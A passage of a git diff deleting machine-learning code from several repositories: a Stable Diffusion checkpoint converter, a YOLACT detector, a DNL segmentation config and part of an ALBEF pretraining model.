(config["layers_per_block"] + 1) - layer_in_block_id = (i - 1) % (config["layers_per_block"] + 1) - - resnets = [ - key - for key in input_blocks[i] - if f"input_blocks.{i}.0" in key and f"input_blocks.{i}.0.op" not in key - ] - attentions = [key for key in input_blocks[i] if f"input_blocks.{i}.1" in key] - - if f"input_blocks.{i}.0.op.weight" in unet_state_dict: - new_checkpoint[ - f"down_blocks.{block_id}.downsamplers.0.conv.weight" - ] = unet_state_dict.pop(f"input_blocks.{i}.0.op.weight") - new_checkpoint[ - f"down_blocks.{block_id}.downsamplers.0.conv.bias" - ] = unet_state_dict.pop(f"input_blocks.{i}.0.op.bias") - - paths = renew_resnet_paths(resnets) - meta_path = { - "old": f"input_blocks.{i}.0", - "new": f"down_blocks.{block_id}.resnets.{layer_in_block_id}", - } - assign_to_checkpoint( - paths, - new_checkpoint, - unet_state_dict, - additional_replacements=[meta_path], - config=config, - ) - - if len(attentions): - paths = renew_attention_paths(attentions) - meta_path = { - "old": f"input_blocks.{i}.1", - "new": f"down_blocks.{block_id}.attentions.{layer_in_block_id}", - } - assign_to_checkpoint( - paths, - new_checkpoint, - unet_state_dict, - additional_replacements=[meta_path], - config=config, - ) - - resnet_0 = middle_blocks[0] - attentions = middle_blocks[1] - resnet_1 = middle_blocks[2] - - resnet_0_paths = renew_resnet_paths(resnet_0) - assign_to_checkpoint(resnet_0_paths, new_checkpoint, unet_state_dict, config=config) - - resnet_1_paths = renew_resnet_paths(resnet_1) - assign_to_checkpoint(resnet_1_paths, new_checkpoint, unet_state_dict, config=config) - - attentions_paths = renew_attention_paths(attentions) - meta_path = {"old": "middle_block.1", "new": "mid_block.attentions.0"} - assign_to_checkpoint( - attentions_paths, - new_checkpoint, - unet_state_dict, - additional_replacements=[meta_path], - config=config, - ) - - for i in range(num_output_blocks): - block_id = i // (config["layers_per_block"] + 1) - layer_in_block_id = i % (config["layers_per_block"] + 1) - output_block_layers = [shave_segments(name, 2) for name in output_blocks[i]] - output_block_list = {} - - for layer in output_block_layers: - layer_id, layer_name = layer.split(".")[0], shave_segments(layer, 1) - if layer_id in output_block_list: - output_block_list[layer_id].append(layer_name) - else: - output_block_list[layer_id] = [layer_name] - - if len(output_block_list) > 1: - resnets = [key for key in output_blocks[i] if f"output_blocks.{i}.0" in key] - attentions = [ - key for key in output_blocks[i] if f"output_blocks.{i}.1" in key - ] - - resnet_0_paths = renew_resnet_paths(resnets) - paths = renew_resnet_paths(resnets) - - meta_path = { - "old": f"output_blocks.{i}.0", - "new": f"up_blocks.{block_id}.resnets.{layer_in_block_id}", - } - assign_to_checkpoint( - paths, - new_checkpoint, - unet_state_dict, - additional_replacements=[meta_path], - config=config, - ) - - if ["conv.weight", "conv.bias"] in output_block_list.values(): - index = list(output_block_list.values()).index( - ["conv.weight", "conv.bias"] - ) - new_checkpoint[ - f"up_blocks.{block_id}.upsamplers.0.conv.weight" - ] = unet_state_dict[f"output_blocks.{i}.{index}.conv.weight"] - new_checkpoint[ - f"up_blocks.{block_id}.upsamplers.0.conv.bias" - ] = unet_state_dict[f"output_blocks.{i}.{index}.conv.bias"] - - # Clear attentions as they have been attributed above. - if len(attentions) == 2: - attentions = [] - - if len(attentions): - paths = renew_attention_paths(attentions) - meta_path = { - "old": f"output_blocks.{i}.1", - "new": f"up_blocks.{block_id}.attentions.{layer_in_block_id}", - } - assign_to_checkpoint( - paths, - new_checkpoint, - unet_state_dict, - additional_replacements=[meta_path], - config=config, - ) - else: - resnet_0_paths = renew_resnet_paths( - output_block_layers, n_shave_prefix_segments=1 - ) - for path in resnet_0_paths: - old_path = ".".join(["output_blocks", str(i), path["old"]]) - new_path = ".".join( - [ - "up_blocks", - str(block_id), - "resnets", - str(layer_in_block_id), - path["new"], - ] - ) - - new_checkpoint[new_path] = unet_state_dict[old_path] - - return new_checkpoint - - -def convert_ldm_vae_checkpoint(checkpoint, config): - # extract state dict for VAE - vae_state_dict = {} - vae_key = "first_stage_model." - keys = list(checkpoint.keys()) - for key in keys: - if key.startswith(vae_key): - vae_state_dict[key.replace(vae_key, "")] = checkpoint.get(key) - - new_checkpoint = {} - - new_checkpoint["encoder.conv_in.weight"] = vae_state_dict["encoder.conv_in.weight"] - new_checkpoint["encoder.conv_in.bias"] = vae_state_dict["encoder.conv_in.bias"] - new_checkpoint["encoder.conv_out.weight"] = vae_state_dict[ - "encoder.conv_out.weight" - ] - new_checkpoint["encoder.conv_out.bias"] = vae_state_dict["encoder.conv_out.bias"] - new_checkpoint["encoder.conv_norm_out.weight"] = vae_state_dict[ - "encoder.norm_out.weight" - ] - new_checkpoint["encoder.conv_norm_out.bias"] = vae_state_dict[ - "encoder.norm_out.bias" - ] - - new_checkpoint["decoder.conv_in.weight"] = vae_state_dict["decoder.conv_in.weight"] - new_checkpoint["decoder.conv_in.bias"] = vae_state_dict["decoder.conv_in.bias"] - new_checkpoint["decoder.conv_out.weight"] = vae_state_dict[ - "decoder.conv_out.weight" - ] - new_checkpoint["decoder.conv_out.bias"] = vae_state_dict["decoder.conv_out.bias"] - new_checkpoint["decoder.conv_norm_out.weight"] = vae_state_dict[ - "decoder.norm_out.weight" - ] - new_checkpoint["decoder.conv_norm_out.bias"] = vae_state_dict[ - "decoder.norm_out.bias" - ] - - new_checkpoint["quant_conv.weight"] = vae_state_dict["quant_conv.weight"] - new_checkpoint["quant_conv.bias"] = vae_state_dict["quant_conv.bias"] - new_checkpoint["post_quant_conv.weight"] = vae_state_dict["post_quant_conv.weight"] - new_checkpoint["post_quant_conv.bias"] = vae_state_dict["post_quant_conv.bias"] - - # Retrieves the keys for the encoder down blocks only - num_down_blocks = len( - { - ".".join(layer.split(".")[:3]) - for layer in vae_state_dict - if "encoder.down" in layer - } - ) - down_blocks = { - layer_id: [key for key in vae_state_dict if f"down.{layer_id}" in key] - for layer_id in range(num_down_blocks) - } - - # Retrieves the keys for the decoder up blocks only - num_up_blocks = len( - { - ".".join(layer.split(".")[:3]) - for layer in vae_state_dict - if "decoder.up" in layer - } - ) - up_blocks = { - layer_id: [key for key in vae_state_dict if f"up.{layer_id}" in key] - for layer_id in range(num_up_blocks) - } - - for i in range(num_down_blocks): - resnets = [ - key - for key in down_blocks[i] - if f"down.{i}" in key and f"down.{i}.downsample" not in key - ] - - if f"encoder.down.{i}.downsample.conv.weight" in vae_state_dict: - new_checkpoint[ - f"encoder.down_blocks.{i}.downsamplers.0.conv.weight" - ] = vae_state_dict.pop(f"encoder.down.{i}.downsample.conv.weight") - new_checkpoint[ - f"encoder.down_blocks.{i}.downsamplers.0.conv.bias" - ] = vae_state_dict.pop(f"encoder.down.{i}.downsample.conv.bias") - - paths = renew_vae_resnet_paths(resnets) - meta_path = {"old": f"down.{i}.block", "new": f"down_blocks.{i}.resnets"} - assign_to_checkpoint( - paths, - new_checkpoint, - vae_state_dict, - additional_replacements=[meta_path], - config=config, - ) - - mid_resnets = [key for key in vae_state_dict if "encoder.mid.block" in key] - num_mid_res_blocks = 2 - for i in range(1, num_mid_res_blocks + 1): - resnets = [key for key in mid_resnets if f"encoder.mid.block_{i}" in key] - - paths = renew_vae_resnet_paths(resnets) - meta_path = {"old": f"mid.block_{i}", "new": f"mid_block.resnets.{i - 1}"} - assign_to_checkpoint( - paths, - new_checkpoint, - vae_state_dict, - additional_replacements=[meta_path], - config=config, - ) - - mid_attentions = [key for key in vae_state_dict if "encoder.mid.attn" in key] - paths = renew_vae_attention_paths(mid_attentions) - meta_path = {"old": "mid.attn_1", "new": "mid_block.attentions.0"} - assign_to_checkpoint( - paths, - new_checkpoint, - vae_state_dict, - additional_replacements=[meta_path], - config=config, - ) - conv_attn_to_linear(new_checkpoint) - - for i in range(num_up_blocks): - block_id = num_up_blocks - 1 - i - resnets = [ - key - for key in up_blocks[block_id] - if f"up.{block_id}" in key and f"up.{block_id}.upsample" not in key - ] - - if f"decoder.up.{block_id}.upsample.conv.weight" in vae_state_dict: - new_checkpoint[ - f"decoder.up_blocks.{i}.upsamplers.0.conv.weight" - ] = vae_state_dict[f"decoder.up.{block_id}.upsample.conv.weight"] - new_checkpoint[ - f"decoder.up_blocks.{i}.upsamplers.0.conv.bias" - ] = vae_state_dict[f"decoder.up.{block_id}.upsample.conv.bias"] - - paths = renew_vae_resnet_paths(resnets) - meta_path = {"old": f"up.{block_id}.block", "new": f"up_blocks.{i}.resnets"} - assign_to_checkpoint( - paths, - new_checkpoint, - vae_state_dict, - additional_replacements=[meta_path], - config=config, - ) - - mid_resnets = [key for key in vae_state_dict if "decoder.mid.block" in key] - num_mid_res_blocks = 2 - for i in range(1, num_mid_res_blocks + 1): - resnets = [key for key in mid_resnets if f"decoder.mid.block_{i}" in key] - - paths = renew_vae_resnet_paths(resnets) - meta_path = {"old": f"mid.block_{i}", "new": f"mid_block.resnets.{i - 1}"} - assign_to_checkpoint( - paths, - new_checkpoint, - vae_state_dict, - additional_replacements=[meta_path], - config=config, - ) - - mid_attentions = [key for key in vae_state_dict if "decoder.mid.attn" in key] - paths = renew_vae_attention_paths(mid_attentions) - meta_path = {"old": "mid.attn_1", "new": "mid_block.attentions.0"} - assign_to_checkpoint( - paths, - new_checkpoint, - vae_state_dict, - additional_replacements=[meta_path], - config=config, - ) - conv_attn_to_linear(new_checkpoint) - return new_checkpoint - - -def convert_ldm_bert_checkpoint(checkpoint, config): - def _copy_attn_layer(hf_attn_layer, pt_attn_layer): - hf_attn_layer.q_proj.weight.data = pt_attn_layer.to_q.weight - hf_attn_layer.k_proj.weight.data = pt_attn_layer.to_k.weight - hf_attn_layer.v_proj.weight.data = pt_attn_layer.to_v.weight - - hf_attn_layer.out_proj.weight = pt_attn_layer.to_out.weight - hf_attn_layer.out_proj.bias = pt_attn_layer.to_out.bias - - def _copy_linear(hf_linear, pt_linear): - hf_linear.weight = pt_linear.weight - hf_linear.bias = pt_linear.bias - - def _copy_layer(hf_layer, pt_layer): - # copy layer norms - _copy_linear(hf_layer.self_attn_layer_norm, pt_layer[0][0]) - _copy_linear(hf_layer.final_layer_norm, pt_layer[1][0]) - - # copy attn - _copy_attn_layer(hf_layer.self_attn, pt_layer[0][1]) - - # copy MLP - pt_mlp = pt_layer[1][1] - _copy_linear(hf_layer.fc1, pt_mlp.net[0][0]) - _copy_linear(hf_layer.fc2, pt_mlp.net[2]) - - def _copy_layers(hf_layers, pt_layers): - for i, hf_layer in enumerate(hf_layers): - if i != 0: - i += i - pt_layer = pt_layers[i : i + 2] - _copy_layer(hf_layer, pt_layer) - - hf_model = LDMBertModel(config).eval() - - # copy embeds - hf_model.model.embed_tokens.weight = checkpoint.transformer.token_emb.weight - hf_model.model.embed_positions.weight.data = ( - checkpoint.transformer.pos_emb.emb.weight - ) - - # copy layer norm - _copy_linear(hf_model.model.layer_norm, checkpoint.transformer.norm) - - # copy hidden layers - _copy_layers(hf_model.model.layers, checkpoint.transformer.attn_layers.layers) - - _copy_linear(hf_model.to_logits, checkpoint.transformer.to_logits) - - return hf_model - - -def convert_ldm_clip_checkpoint(checkpoint): - text_model = CLIPTextModel.from_pretrained("openai/clip-vit-large-patch14") - - keys = list(checkpoint.keys()) - - text_model_dict = {} - - for key in keys: - if key.startswith("cond_stage_model.transformer"): - text_model_dict[key[len("cond_stage_model.transformer.") :]] = checkpoint[ - key - ] - - text_model.load_state_dict(text_model_dict) - - return text_model - - -def convert_full_checkpoint( - checkpoint_path: str, config_file, scheduler_type, extract_ema, output_path=None -): - original_config = OmegaConf.load(config_file) - checkpoint = torch.load(checkpoint_path, weights_only=False) - checkpoint = checkpoint["state_dict"] - - num_train_timesteps = original_config.model.params.timesteps - beta_start = original_config.model.params.linear_start - beta_end = original_config.model.params.linear_end - if scheduler_type == "PNDM": - scheduler = PNDMScheduler( - beta_end=beta_end, - beta_schedule="scaled_linear", - beta_start=beta_start, - num_train_timesteps=num_train_timesteps, - skip_prk_steps=True, - ) - elif scheduler_type == "K-LMS": - scheduler = LMSDiscreteScheduler( - beta_start=beta_start, beta_end=beta_end, beta_schedule="scaled_linear" - ) - elif scheduler_type == "Euler": - scheduler = EulerDiscreteScheduler( - beta_start=beta_start, beta_end=beta_end, beta_schedule="scaled_linear" - ) - elif scheduler_type == "EulerAncestral": - scheduler = EulerAncestralDiscreteScheduler( - beta_start=beta_start, beta_end=beta_end, beta_schedule="scaled_linear" - ) - elif scheduler_type == "DDIM": - scheduler = DDIMScheduler( - beta_start=beta_start, - beta_end=beta_end, - beta_schedule="scaled_linear", - clip_sample=False, - set_alpha_to_one=False, - ) - else: - raise ValueError(f"Scheduler of type {scheduler_type} doesn't exist!") - - # Convert the UNet2DConditionModel model. - unet_config = create_unet_diffusers_config(original_config) - converted_unet_checkpoint = convert_ldm_unet_checkpoint( - checkpoint, unet_config, extract_ema=extract_ema - ) - - # Convert the VAE model. - vae_config = create_vae_diffusers_config(original_config) - converted_vae_checkpoint = convert_ldm_vae_checkpoint(checkpoint, vae_config) - - # Convert the text model. - text_model = convert_ldm_clip_checkpoint(checkpoint) - - del checkpoint - - unet = UNet2DConditionModel(**unet_config) - unet.load_state_dict(converted_unet_checkpoint) - del converted_unet_checkpoint - - vae = AutoencoderKL(**vae_config) - vae.load_state_dict(converted_vae_checkpoint) - del converted_vae_checkpoint - - tokenizer = CLIPTokenizer.from_pretrained("openai/clip-vit-large-patch14") - safety_checker = StableDiffusionSafetyChecker.from_pretrained( - "CompVis/stable-diffusion-safety-checker", device_map="auto" - ) - feature_extractor = AutoFeatureExtractor.from_pretrained( - "CompVis/stable-diffusion-safety-checker" - ) - pipe = StableDiffusionPipeline( - vae=vae, - text_encoder=text_model, - tokenizer=tokenizer, - unet=unet, - scheduler=scheduler, - safety_checker=safety_checker, - feature_extractor=feature_extractor, - ) - - pipe.save_pretrained(output_path) diff --git a/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmdet_null/models/detectors/yolact.py b/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmdet_null/models/detectors/yolact.py deleted file mode 100644 index f32fde0d3dcbb55a405e05df433c4353938a148b..0000000000000000000000000000000000000000 --- a/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmdet_null/models/detectors/yolact.py +++ /dev/null @@ -1,146 +0,0 @@ -import torch - -from mmdet.core import bbox2result -from ..builder import DETECTORS, build_head -from .single_stage import SingleStageDetector - - -@DETECTORS.register_module() -class YOLACT(SingleStageDetector): - """Implementation of `YOLACT `_""" - - def __init__(self, - backbone, - neck, - bbox_head, - segm_head, - mask_head, - train_cfg=None, - test_cfg=None, - pretrained=None): - super(YOLACT, self).__init__(backbone, neck, bbox_head, train_cfg, - test_cfg, pretrained) - self.segm_head = build_head(segm_head) - self.mask_head = build_head(mask_head) - self.init_segm_mask_weights() - - def init_segm_mask_weights(self): - """Initialize weights of the YOLACT segm head and YOLACT mask head.""" - self.segm_head.init_weights() - self.mask_head.init_weights() - - def forward_dummy(self, img): - """Used for computing network flops. - - See `mmdetection/tools/analysis_tools/get_flops.py` - """ - raise NotImplementedError - - def forward_train(self, - img, - img_metas, - gt_bboxes, - gt_labels, - gt_bboxes_ignore=None, - gt_masks=None): - """ - Args: - img (Tensor): of shape (N, C, H, W) encoding input images. - Typically these should be mean centered and std scaled. - img_metas (list[dict]): list of image info dict where each dict - has: 'img_shape', 'scale_factor', 'flip', and may also contain - 'filename', 'ori_shape', 'pad_shape', and 'img_norm_cfg'. - For details on the values of these keys see - `mmdet/datasets/pipelines/formatting.py:Collect`. - gt_bboxes (list[Tensor]): Ground truth bboxes for each image with - shape (num_gts, 4) in [tl_x, tl_y, br_x, br_y] format. - gt_labels (list[Tensor]): class indices corresponding to each box - gt_bboxes_ignore (None | list[Tensor]): specify which bounding - boxes can be ignored when computing the loss. - gt_masks (None | Tensor) : true segmentation masks for each box - used if the architecture supports a segmentation task. - - Returns: - dict[str, Tensor]: a dictionary of loss components - """ - # convert Bitmap mask or Polygon Mask to Tensor here - gt_masks = [ - gt_mask.to_tensor(dtype=torch.uint8, device=img.device) - for gt_mask in gt_masks - ] - - x = self.extract_feat(img) - - cls_score, bbox_pred, coeff_pred = self.bbox_head(x) - bbox_head_loss_inputs = (cls_score, bbox_pred) + (gt_bboxes, gt_labels, - img_metas) - losses, sampling_results = self.bbox_head.loss( - *bbox_head_loss_inputs, gt_bboxes_ignore=gt_bboxes_ignore) - - segm_head_outs = self.segm_head(x[0]) - loss_segm = self.segm_head.loss(segm_head_outs, gt_masks, gt_labels) - losses.update(loss_segm) - - mask_pred = self.mask_head(x[0], coeff_pred, gt_bboxes, img_metas, - sampling_results) - loss_mask = self.mask_head.loss(mask_pred, gt_masks, gt_bboxes, - img_metas, sampling_results) - losses.update(loss_mask) - - # check NaN and Inf - for loss_name in losses.keys(): - assert torch.isfinite(torch.stack(losses[loss_name]))\ - .all().item(), '{} becomes infinite or NaN!'\ - .format(loss_name) - - return losses - - def simple_test(self, img, img_metas, rescale=False): - """Test function without test time augmentation.""" - x = self.extract_feat(img) - - cls_score, bbox_pred, coeff_pred = self.bbox_head(x) - - bbox_inputs = (cls_score, bbox_pred, - coeff_pred) + (img_metas, self.test_cfg, rescale) - det_bboxes, det_labels, det_coeffs = self.bbox_head.get_bboxes( - *bbox_inputs) - bbox_results = [ - bbox2result(det_bbox, det_label, self.bbox_head.num_classes) - for det_bbox, det_label in zip(det_bboxes, det_labels) - ] - - num_imgs = len(img_metas) - scale_factors = tuple(meta['scale_factor'] for meta in img_metas) - if all(det_bbox.shape[0] == 0 for det_bbox in det_bboxes): - segm_results = [[[] for _ in range(self.mask_head.num_classes)] - for _ in range(num_imgs)] - else: - # if det_bboxes is rescaled to the original image size, we need to - # rescale it back to the testing scale to obtain RoIs. - if rescale and not isinstance(scale_factors[0], float): - scale_factors = [ - torch.from_numpy(scale_factor).to(det_bboxes[0].device) - for scale_factor in scale_factors - ] - _bboxes = [ - det_bboxes[i][:, :4] * - scale_factors[i] if rescale else det_bboxes[i][:, :4] - for i in range(len(det_bboxes)) - ] - mask_preds = self.mask_head(x[0], det_coeffs, _bboxes, img_metas) - # apply mask post-processing to each image individually - segm_results = [] - for i in range(num_imgs): - if det_bboxes[i].shape[0] == 0: - segm_results.append( - [[] for _ in range(self.mask_head.num_classes)]) - else: - segm_result = self.mask_head.get_seg_masks( - mask_preds[i], det_labels[i], img_metas[i], rescale) - segm_results.append(segm_result) - return list(zip(bbox_results, segm_results)) - - def aug_test(self, imgs, img_metas, rescale=False): - """Test with augmentations.""" - raise NotImplementedError diff --git a/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/configs/_base_/models/dnl_r50-d8.py b/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/configs/_base_/models/dnl_r50-d8.py deleted file mode 100644 index edb4c174c51e34c103737ba39bfc48bf831e561d..0000000000000000000000000000000000000000 --- a/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/configs/_base_/models/dnl_r50-d8.py +++ /dev/null @@ -1,46 +0,0 @@ -# model settings -norm_cfg = dict(type='SyncBN', requires_grad=True) -model = dict( - type='EncoderDecoder', - pretrained='open-mmlab://resnet50_v1c', - backbone=dict( - type='ResNetV1c', - depth=50, - num_stages=4, - out_indices=(0, 1, 2, 3), - dilations=(1, 1, 2, 4), - strides=(1, 2, 1, 1), - norm_cfg=norm_cfg, - norm_eval=False, - style='pytorch', - contract_dilation=True), - decode_head=dict( - type='DNLHead', - in_channels=2048, - in_index=3, - channels=512, - dropout_ratio=0.1, - reduction=2, - use_scale=True, - mode='embedded_gaussian', - num_classes=19, - norm_cfg=norm_cfg, - align_corners=False, - loss_decode=dict( - type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0)), - auxiliary_head=dict( - type='FCNHead', - in_channels=1024, - in_index=2, - channels=256, - num_convs=1, - concat_input=False, - dropout_ratio=0.1, - num_classes=19, - norm_cfg=norm_cfg, - align_corners=False, - loss_decode=dict( - type='CrossEntropyLoss', use_sigmoid=False, loss_weight=0.4)), - # model training and testing settings - train_cfg=dict(), - test_cfg=dict(mode='whole')) diff --git a/spaces/Rongjiehuang/GenerSpeech/modules/parallel_wavegan/optimizers/__init__.py b/spaces/Rongjiehuang/GenerSpeech/modules/parallel_wavegan/optimizers/__init__.py deleted file mode 100644 index a0e0c5932838281e912079e5784d84d43444a61a..0000000000000000000000000000000000000000 --- a/spaces/Rongjiehuang/GenerSpeech/modules/parallel_wavegan/optimizers/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -from torch.optim import * # NOQA -from .radam import * # NOQA diff --git a/spaces/SeViLA/SeViLA/lavis/models/albef_models/albef_pretrain.py b/spaces/SeViLA/SeViLA/lavis/models/albef_models/albef_pretrain.py deleted file mode 100644 index e25baf30a65f3218bb7b9ab8ebed6b01f74c773b..0000000000000000000000000000000000000000 --- a/spaces/SeViLA/SeViLA/lavis/models/albef_models/albef_pretrain.py +++ /dev/null @@ -1,416 +0,0 @@ -""" - Copyright (c) 2022, salesforce.com, inc. - All rights reserved. - SPDX-License-Identifier: BSD-3-Clause - For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause -""" - -from copy import deepcopy - -import numpy as np -import torch -import torch.nn.functional as F -from lavis.common.registry import registry -from lavis.common.utils import get_abs_path -from lavis.models.albef_models import AlbefBase -from lavis.models.albef_models.albef_outputs import ( - AlbefIntermediateOutput, - AlbefOutput, - AlbefSimilarity, -) -from lavis.models.base_model import MomentumDistilationMixin, SharedQueueMixin -from lavis.models.med import BertForMaskedLM -from lavis.models.vit import VisionTransformerEncoder -from torch import nn -from transformers import BertConfig - - -@registry.register_model("albef_pretrain") -class AlbefPretrain(AlbefBase, MomentumDistilationMixin, SharedQueueMixin): - """ - ALBEF pretrain model. - - Supported model types: - - base: ALBEF base model used for pretraining. - """ - - PRETRAINED_MODEL_CONFIG_DICT = { - "base": "configs/models/albef_pretrain_base.yaml", - } - - def __init__( - self, - image_encoder, - text_encoder, - queue_size, - embed_dim=256, - mlm_mask_prob=0.15, - temp=0.07, - momentum=0.995, - alpha=0.4, - max_txt_len=30, - ): - super().__init__() - - self.tokenizer = self.init_tokenizer() - - self.visual_encoder = image_encoder - self.text_encoder = text_encoder - - text_width = text_encoder.config.hidden_size - vision_width = image_encoder.vision_width - - self.embed_dim = embed_dim - - self.vision_proj = nn.Linear(vision_width, embed_dim) - self.text_proj = nn.Linear(text_width, embed_dim) - - self.itm_head = nn.Linear(text_width, 2) - - # create the momentum encoder - self.visual_encoder_m = deepcopy(self.visual_encoder) - self.text_encoder_m = deepcopy(self.text_encoder) - - self.vision_proj_m = deepcopy(self.vision_proj) - self.text_proj_m = deepcopy(self.text_proj) - - self.model_pairs = [ - [self.visual_encoder, self.visual_encoder_m], - [self.text_encoder, self.text_encoder_m], - [self.vision_proj, self.vision_proj_m], - [self.text_proj, self.text_proj_m], - ] - self.copy_params() - - # create the queue - self.register_buffer("image_queue", torch.randn(embed_dim, queue_size)) - self.register_buffer("text_queue", torch.randn(embed_dim, queue_size)) - self.register_buffer("queue_ptr", torch.zeros(1, dtype=torch.long)) - - self.image_queue = nn.functional.normalize(self.image_queue, dim=0) - self.text_queue = nn.functional.normalize(self.text_queue, dim=0) - - self.queue_size = queue_size - self.momentum = momentum - self.temp = nn.Parameter(temp * torch.ones([])) - - self.alpha = alpha - self.max_txt_len = max_txt_len - - self.mlm_probability = mlm_mask_prob - - def _rampup_factor(self, epoch, iters, num_iters_per_epoch): - return min(1, (epoch * num_iters_per_epoch + iters) / (2 * num_iters_per_epoch)) - - def forward(self, samples): - """ - Args: - samples (dict): A dictionary containing the following keys: - - image (torch.Tensor): A tensor of shape (batch_size, 3, H, W). The input images. Default: H=224, W=224. - - text_input (list): A list of length batch_size, each element is a string of text/caption. - - epoch (int): The current epoch. - - iters (int): The current iteration. - - num_iters_per_epoch (int): The number of iterations per epoch. - - Returns: - BlipOutput: A BlipOutput object containing loss and intermediate output. See ``lavis.models.blip_models.blip_outputs.BlipOutput`` for more details. - - Examples: - >>> import torch - >>> from lavis.models import load_model - >>> model = load_model("albef_pretrain") - >>> images = torch.randn(4, 3, 224, 224) - >>> text_input = ["caption of image 1", "another caption of image 1", "caption of image 2", "caption of image 3"] - >>> samples = {"image": images, "text_input": text_input, "epoch": 0, "iters": 0, "num_iters_per_epoch": 100} - >>> output = model(samples) - >>> output.keys() - odict_keys(['sims', 'intermediate_output', 'loss', 'loss_itc', 'loss_itm', 'loss_mlm']) - """ - image = samples["image"] - caption = samples["text_input"] - - alpha = self.alpha * self._rampup_factor( - epoch=samples["epoch"], - iters=samples["iters"], - num_iters_per_epoch=samples["num_iters_per_epoch"], - ) - - with torch.no_grad(): - self.temp.clamp_(0.001, 0.5) - - image_embeds = self.visual_encoder.forward_features(image) - image_atts = torch.ones(image_embeds.size()[:-1], dtype=torch.long).to( - self.device - ) - - text = self.tokenizer( - caption, - padding="max_length", - truncation=True, - max_length=self.max_txt_len, - return_tensors="pt", - ).to(self.device) - - image_feat = F.normalize(self.vision_proj(image_embeds[:, 0, :]), dim=-1) - - text_output = self.text_encoder.bert( - text.input_ids, - attention_mask=text.attention_mask, - return_dict=True, - mode="text", - ) - text_embeds = text_output.last_hidden_state - text_feat = F.normalize(self.text_proj(text_embeds[:, 0, :]), dim=-1) - - # get momentum features - with torch.no_grad(): - self._momentum_update() - image_embeds_m = self.visual_encoder_m(image) - image_feat_m = F.normalize( - self.vision_proj_m(image_embeds_m[:, 0, :]), dim=-1 - ) - image_feat_all = torch.cat( - [image_feat_m.t(), self.image_queue.clone().detach()], dim=1 - ) - text_output_m = self.text_encoder_m.bert( - text.input_ids, - attention_mask=text.attention_mask, - return_dict=True, - mode="text", - ) - text_embeds_m = text_output_m.last_hidden_state - text_feat_m = F.normalize(self.text_proj_m(text_embeds_m[:, 0, :]), dim=-1) - text_feat_all = torch.cat( - [text_feat_m.t(), self.text_queue.clone().detach()], dim=1 - ) - - sim_i2t_m = image_feat_m @ text_feat_all / self.temp - sim_t2i_m = text_feat_m @ image_feat_all / self.temp - - sim_targets = torch.zeros(sim_i2t_m.size()).to(image.device) - sim_targets.fill_diagonal_(1) - - sim_i2t_targets = ( - alpha * F.softmax(sim_i2t_m, dim=1) + (1 - alpha) * sim_targets - ) - sim_t2i_targets = ( - alpha * F.softmax(sim_t2i_m, dim=1) + (1 - alpha) * sim_targets - ) - - sim_i2t = image_feat @ text_feat_all / self.temp - sim_t2i = text_feat @ image_feat_all / self.temp - - loss_i2t = -torch.sum( - F.log_softmax(sim_i2t, dim=1) * sim_i2t_targets, dim=1 - ).mean() - loss_t2i = -torch.sum( - F.log_softmax(sim_t2i, dim=1) * sim_t2i_targets, dim=1 - ).mean() - - loss_itc = (loss_i2t + loss_t2i) / 2 - - self._dequeue_and_enqueue(image_feat_m, text_feat_m) - - # forward the positve image-text pair - encoder_output_pos = self.text_encoder.bert( - encoder_embeds=text_embeds, - attention_mask=text.attention_mask, - encoder_hidden_states=image_embeds, - encoder_attention_mask=image_atts, - return_dict=True, - mode="fusion", - ) - with torch.no_grad(): - bs = image.size(0) - - weights_i2t = sim_i2t[:, :bs].clone() - weights_t2i = sim_t2i[:, :bs].clone() - - weights_i2t.fill_diagonal_(-np.Inf) - weights_t2i.fill_diagonal_(-np.Inf) - - weights_i2t = F.softmax(weights_i2t, dim=1) - weights_t2i = F.softmax(weights_t2i, dim=1) - - # select a negative image for each text - image_embeds_neg = [] - for b in range(bs): - neg_idx = torch.multinomial(weights_t2i[b], 1).item() - image_embeds_neg.append(image_embeds[neg_idx]) - image_embeds_neg = torch.stack(image_embeds_neg, dim=0) - - # select a negative text for each image - text_embeds_neg = [] - text_atts_neg = [] - for b in range(bs): - neg_idx = torch.multinomial(weights_i2t[b], 1).item() - text_embeds_neg.append(text_embeds[neg_idx]) - text_atts_neg.append(text.attention_mask[neg_idx]) - text_embeds_neg = torch.stack(text_embeds_neg, dim=0) - text_atts_neg = torch.stack(text_atts_neg, dim=0) - - text_embeds_all = torch.cat([text_embeds, text_embeds_neg], dim=0) - text_atts_all = torch.cat([text.attention_mask, text_atts_neg], dim=0) - - image_embeds_all = torch.cat([image_embeds_neg, image_embeds], dim=0) - image_atts_all = torch.cat([image_atts, image_atts], dim=0) - - encoder_output_neg = self.text_encoder.bert( - encoder_embeds=text_embeds_all, - attention_mask=text_atts_all, - encoder_hidden_states=image_embeds_all, - encoder_attention_mask=image_atts_all, - return_dict=True, - mode="fusion", - ) - - vl_embeddings = torch.cat( - [ - encoder_output_pos.last_hidden_state[:, 0, :], - encoder_output_neg.last_hidden_state[:, 0, :], - ], - dim=0, - ) - itm_logits = self.itm_head(vl_embeddings) - - itm_labels = torch.cat( - [torch.ones(bs, dtype=torch.long), torch.zeros(2 * bs, dtype=torch.long)], - dim=0, - ).to(self.device) - loss_itm = F.cross_entropy(itm_logits, itm_labels) - - # MLM - input_ids = text.input_ids.clone() - labels = input_ids.clone() - - probability_matrix = torch.full(labels.shape, self.mlm_probability) - input_ids, labels = self.mask( - input_ids, - self.text_encoder.config.vocab_size, - self.device, - targets=labels, - probability_matrix=probability_matrix, - ) - - with torch.no_grad(): - logits_m = self.text_encoder_m( - input_ids, - attention_mask=text.attention_mask, - encoder_hidden_states=image_embeds_m, - encoder_attention_mask=image_atts, - return_dict=True, - return_logits=True, - ) - mlm_output = self.text_encoder( - input_ids, - attention_mask=text.attention_mask, - encoder_hidden_states=image_embeds, - encoder_attention_mask=image_atts, - return_dict=True, - labels=labels, - soft_labels=F.softmax(logits_m, dim=-1), - alpha=alpha, - ) - loss_mlm = mlm_output.loss - - return AlbefOutput( - loss=loss_itc + loss_itm + loss_mlm, - loss_itc=loss_itc, - loss_itm=loss_itm, - loss_mlm=loss_mlm, - sims=AlbefSimilarity( - sim_i2t=sim_i2t, - 